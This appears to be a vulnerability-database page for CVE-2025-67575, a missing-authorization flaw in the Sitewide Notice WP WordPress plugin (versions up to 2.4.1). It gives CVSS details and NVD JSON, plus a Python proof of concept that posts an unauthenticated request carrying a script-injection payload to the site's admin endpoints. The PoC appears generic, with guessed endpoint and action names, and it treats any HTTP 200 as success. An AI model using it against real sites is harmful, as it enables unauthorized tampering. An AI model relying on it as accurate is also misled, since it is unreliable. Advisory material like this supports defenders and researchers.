Security Vulnerability Report
中文
CVE-2025-67575 CVSS 5.3 MEDIUM

CVE-2025-67575

Published: 2025-12-09 16:18:35
Last Modified: 2026-04-27 18:16:44

Description

Missing Authorization vulnerability in Andrew Lima Sitewide Notice WP sitewide-notice-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sitewide Notice WP: from n/a through <= 2.4.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Sitewide Notice WP <= 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67575 PoC - Missing Authorization in Sitewide Notice WP # Target: WordPress site with sitewide-notice-wp plugin <= 2.4.1 target = "http://target-wordpress-site.com" # Step 1: Identify the vulnerable endpoint # The plugin's admin-ajax.php or custom REST endpoints lack authorization checks vulnerable_endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-json/sitewide-notice/v1/" ] # Step 2: Attempt to access admin functions without authentication # This PoC demonstrates unauthorized access to notice management def exploit_missing_auth(): headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # Example: Unauthorized notice creation/modification attempt # Adjust the action and parameters based on actual vulnerable endpoint data = { "action": "sitewide_notice_save", "notice_content": "<script>alert('XSS')</script>", "notice_settings": "malicious_config" } for endpoint in vulnerable_endpoints: try: response = requests.post(endpoint, data=data, headers=headers, timeout=10) # Check if request succeeded without authentication if response.status_code == 200: print(f"[!] Potential vulnerability confirmed at: {endpoint}") print(f"Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("CVE-2025-67575 PoC - Sitewide Notice WP Missing Authorization") exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67575", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:34.713", "lastModified": "2026-04-27T18:16:43.943", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Andrew Lima Sitewide Notice WP sitewide-notice-wp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sitewide Notice WP: from n/a through <= 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sitewide-notice-wp/vulnerability/wordpress-sitewide-notice-wp-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}